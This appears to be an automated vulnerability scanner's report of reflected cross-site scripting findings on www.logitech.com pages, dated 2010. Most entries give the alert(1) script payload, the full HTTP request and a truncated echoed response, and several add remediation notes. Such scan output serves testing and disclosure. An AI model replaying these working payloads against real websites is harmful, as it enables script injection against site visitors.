This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/webcam-communications/video-security-systems738ef"><script>alert(1)</script>7fae476ec20/monitoring-services HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c52d5</script><script>alert(1)</script>cdd90d872a6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/webcam-communications/video-security-systems/monitoring-servicesc52d5</script><script>alert(1)</script>cdd90d872a6 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50017"><script>alert(1)</script>6558b857976 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/webcam-communications/video-security-systems/monitoring-services50017"><script>alert(1)</script>6558b857976 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 159a2</script><script>alert(1)</script>aeae3c8a8f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /159a2</script><script>alert(1)</script>aeae3c8a8f1/webcam-communications/video-security-systems/other-accessories HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
<m ...[SNIP]... <script type="text/javascript" language="javascript1.1"> function multitrack_tabs(parm) { dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','159a2</script><script>alert(1)</script>aeae3c8a8f1/webcam-communications/video-security-systems/other-accessories' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm); } function multitrack_popup(parm1,parm2) ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7362e"><script>alert(1)</script>37566eed7c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us7362e"><script>alert(1)</script>37566eed7c/webcam-communications/video-security-systems/other-accessories HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2e65"><script>alert(1)</script>210cfc5c658 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/webcam-communicationsd2e65"><script>alert(1)</script>210cfc5c658/video-security-systems/other-accessories HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68487</script><script>alert(1)</script>4d5b6c7f14 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/webcam-communications68487</script><script>alert(1)</script>4d5b6c7f14/video-security-systems/other-accessories HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e413b"><script>alert(1)</script>a9bd5c36e4f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/webcam-communications/video-security-systemse413b"><script>alert(1)</script>a9bd5c36e4f/other-accessories HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f832</script><script>alert(1)</script>0794d1648a1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/webcam-communications/video-security-systems8f832</script><script>alert(1)</script>0794d1648a1/other-accessories HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80a69"><script>alert(1)</script>b0c748584c2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/webcam-communications/video-security-systems/other-accessories80a69"><script>alert(1)</script>b0c748584c2 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14ad4</script><script>alert(1)</script>0b71c67f855 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/webcam-communications/video-security-systems/other-accessories14ad4</script><script>alert(1)</script>0b71c67f855 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98a9c"><script>alert(1)</script>94bb196e015 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us98a9c"><script>alert(1)</script>94bb196e015/webcam-communications/webcams HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b59a8</script><script>alert(1)</script>ce33f6c58c0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /b59a8</script><script>alert(1)</script>ce33f6c58c0/webcam-communications/webcams HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1a93"><script>alert(1)</script>883ce620dcf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/webcam-communicationsb1a93"><script>alert(1)</script>883ce620dcf/webcams HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb2e3</script><script>alert(1)</script>4a3f90ba03c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/webcam-communicationseb2e3</script><script>alert(1)</script>4a3f90ba03c/webcams HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9ae7"><script>alert(1)</script>6f4e478d029 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/webcam-communications/webcamse9ae7"><script>alert(1)</script>6f4e478d029 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa6ba</script><script>alert(1)</script>15d6dd3d7ed was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/webcam-communications/webcamsaa6ba</script><script>alert(1)</script>15d6dd3d7ed HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c5e9"><script>alert(1)</script>2380a548e44 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 445ff</script><script>alert(1)</script>b96117f1025 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 270d2"><script>alert(1)</script>dd464cad3fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /270d2"><script>alert(1)</script>dd464cad3fd/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 134f6</script><script>alert(1)</script>63f3354f6f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /134f6</script><script>alert(1)</script>63f3354f6f5/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b369b</script><script>alert(1)</script>b6cc7ea50ec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /b369b</script><script>alert(1)</script>b6cc7ea50ec/v2/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7848"><script>alert(1)</script>09cc163c1e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /f7848"><script>alert(1)</script>09cc163c1e3/v2/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56b70"><script>alert(1)</script>421b68588f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /56b70"><script>alert(1)</script>421b68588f5/v2/home/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1533a</script><script>alert(1)</script>265109a6d39 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /1533a</script><script>alert(1)</script>265109a6d39/v2/home/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83971"><script>alert(1)</script>cd170009e94 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hd-webcams83971"><script>alert(1)</script>cd170009e94/fluid-motion HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f96b</script><script>alert(1)</script>1b2a76b1486 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /1f96b</script><script>alert(1)</script>1b2a76b1486/fluid-motion HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:43:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 78ba5</script><script>alert(1)</script>85bcbcbb1b4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /hd-webcams/fluid-motion78ba5</script><script>alert(1)</script>85bcbcbb1b4 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:43:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a061"><script>alert(1)</script>ef61c06fdb0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hd-webcams/fluid-motion6a061"><script>alert(1)</script>ef61c06fdb0 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:43:01 GMT Connection: close
